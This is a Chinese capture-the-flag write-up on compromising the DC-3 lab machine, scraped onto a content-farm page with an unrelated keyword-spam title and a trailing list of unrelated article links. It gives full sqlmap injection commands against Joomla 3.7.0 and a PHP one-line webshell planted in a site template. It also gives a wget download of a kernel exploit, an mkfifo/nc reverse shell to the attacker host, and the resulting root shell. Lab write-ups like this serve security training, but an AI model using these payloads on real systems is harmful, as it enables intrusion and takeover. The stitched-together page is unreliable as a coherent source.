当前位置: 首页 > news >正文

什么网站可以做片头永安市建设局网站

news 2025/12/26 18:01:44
什么网站可以做片头,永安市建设局网站,北京建设工程网站,百度推广是什么意思joomla3.7.0的提权 信息收集 靶机IP:192.168.20.136 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 首先nmap扫端口和版本#xff0c;dirsearch跑下目录#xff0c;wappalyzer也可以用下 发现服务器用的ubuntu#xff0c;JoomlaCMS…joomla3.7.0的提权 信息收集 靶机IP:192.168.20.136 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 首先nmap扫端口和版本dirsearch跑下目录wappalyzer也可以用下 发现服务器用的ubuntuJoomlaCMS等信息。 还有个admin敏感目录这个是joomla后台界面。 漏洞利用 考虑Joomla漏洞 有专门针对Joomla的漏扫工具joomscan kali apt install joomscan下载 joomscan -u 192.168.20.136得到joomla的版本3.7.0 去searchsploit看看有没有对应版本的漏洞 看到一个sql注入漏洞 去目录查看txt/usr/share/exploitdb/exploits/php/webapps 给出了我们注入点和sqlmap命令正常拿后台密码 查看数据库 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --batch --dbs 查看joomladb的表 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] -D joomladb --tables 查看users表的列 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --columns -T #__users -D joomladb 取值 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --dump -C username,password -T #__users -D joomladb 拿到admin的密码不过是加密的观察密文特征搜素joomla3.7.0的加密方式发现为crypt()这里可以用hashcat和john字典解密。 hashcat使用教程 hashcat -a 0 -m 3200 source.txt rockyou.txt source.txt中存的是密文 john 拿到admin后台密码snoopy注意去后台路径登录 这里有两种方式一种是上传语言包我这里下载语言包界面没东西详情见joomla上传语言包提权 第二种是修改joom网站提权我们可以直接编辑网站的源码。 我们选择beez3模板在index.php中直接加入一句话木马?php $sl create_function(, $_REQUEST[klion]); $sl(); ? 注意在Style中把default界面设置为beez3 之后用蚁剑链接的时候要注意这个后台界面解析不了首页的php我们要打开网站的首页已经变为beez3模板 拿蚁剑连接 提权 ubuntu版本漏洞 lsb_release -a uname -a查看版本 searchsploit 查找版本漏洞 去URL中找EXP下载在攻击机用python3 -m http.server 4444 开启一个简单http服务器。 wget http://192.168.20.128:4444/39772.zip 之后根据URL教程去执行就好 我这蚁剑出了个问题一直提权失败之后用nc反弹shell到kali才提权成功了。 这个靶机nc没有-e参数用不了nc -e /bin/sh 192.168.20.128 6666 要用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.20.128 6666 /tmp/f 提权部分过程find 输出太多留下有用部分了 ┌──(root㉿kali)-[/home/kali/Desktop/DC-3] └─# nc -lvp 6666 listening on [any] 6666 ... 192.168.20.136: inverse host lookup failed: Host name lookup failure connect to [192.168.20.128] from (UNKNOWN) [192.168.20.136] 54684 /bin/sh: 0: cant access tty; job control turned off $ ls 39772 39772.zip 44300.zip LICENSE.txt README.txt __MACOSX administrator bin cache cli components configuration.php decr decr.c htaccess.txt images includes index.php language layouts libraries media modules plugins pwn pwn.c robots.txt.dist templates tmp web.config.txt $ cd 39772 $ ls crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar $ cd ebpf_mapfd_doubleput_exploit $ ls compile.sh doubleput doubleput.c fuse_mount hello hello.c suidhelper suidhelper.c $ ./compile.sh doubleput.c: In function make_setuid: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].insns (__aligned_u64) insns,^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].license (__aligned_u64)^ $ ./doubleput fuse: mountpoint is not empty fuse: if you are sure this is safe, use the nonempty mount option doubleput: system() failed doubleput: child quit before we got a good file* suid file detected, launching rootshell... we have root privs now...id uid0(root) gid0(root) groups0(root),33(www-data) find / -name *flag* /root/the-flag.txt /proc/sys/kernel/acpi_video_flags /proc/kpageflags /usr/lib/i386-linux-gnu/perl/5.22.1/bits/waitflags.phls compile.sh doubleput doubleput.c fuse_mount hello hello.c suidhelper suidhelper.c cd /root ls the-flag.txt cat the-flag.txt__ __ _ _ ____ _ _ _ _ \ \ / /__| | | | _ \ ___ _ __ ___| | | | |\ \ /\ / / _ \ | | | | | |/ _ \| _ \ / _ \ | | | |\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)Congratulations are in order. :-)I hope youve enjoyed this challenge as I enjoyed making it.If there are any ways that I can improve these little challenges, please let me know.As per usual, comments and complaints can be sent via Twitter to DCAU7Have a great day!!!!
http://www.w-s-a.com/news/283675/

相关文章:

  • 公司主页的网站格式wordpress自动推送给百度
  • 网站建设辶金手指排名十二wordpress 当数据库
  • 无锡手机网站建设服务苏州展厅设计企业
  • 无锡网站制作需要多少钱北京二次感染最新消息
  • 网站开发视频播放无画面杭州房产信息网官网
  • 网站开发 改进如何创建公众号平台
  • wordpress网站响应很慢只有asp网站代码可以重新编译吗
  • 哪个网站教做饭做的好wordpress热点文章
  • 可以做推广东西的网站重庆网站建设 重庆网站制作
  • 珠海网站建设培训学校wordpress去版权 合法
  • 建设食品商购网站学校网站设计实验报告
  • 建个网站多少钱沭阳奥体小区做网站的
  • 广州视频网站建站公司php网页设计作业代码
  • 成都公司网站设计如何制作网址最简单的方法
  • 温州 做网站福建住房城乡建设部网站
  • 网站自动化采集成都网站设计费用
  • 广东专业网站定制建设淘宝网站的人员组织结构
  • 网站改版seo无锡有多少家公司
  • h5美食制作网站模板下载wordpress大学百度云
  • 零陵做网站建立网站的公司平台
  • 某企业电子商务网站建设网站开发实验结论
  • 自己做的网站突然打不开杭州哪些做网站公司好
  • 株洲专业建设网站免费cms内容管理系统
  • 网上建立网站赚钱网站建设方案书纯文字
  • 专业网站设计哪家好it外包合同模板
  • 个人网站备案都需要什么中小企业服务网
  • 佛山网站建设哪个在公司网站投简历该怎么做
  • 八戒网站做推广老域名全部失效请拿笔记好
  • iss服务器网站建设甘肃建设厅网站执业注册中心
  • 域名访问网站 过程网站 免费 托管运营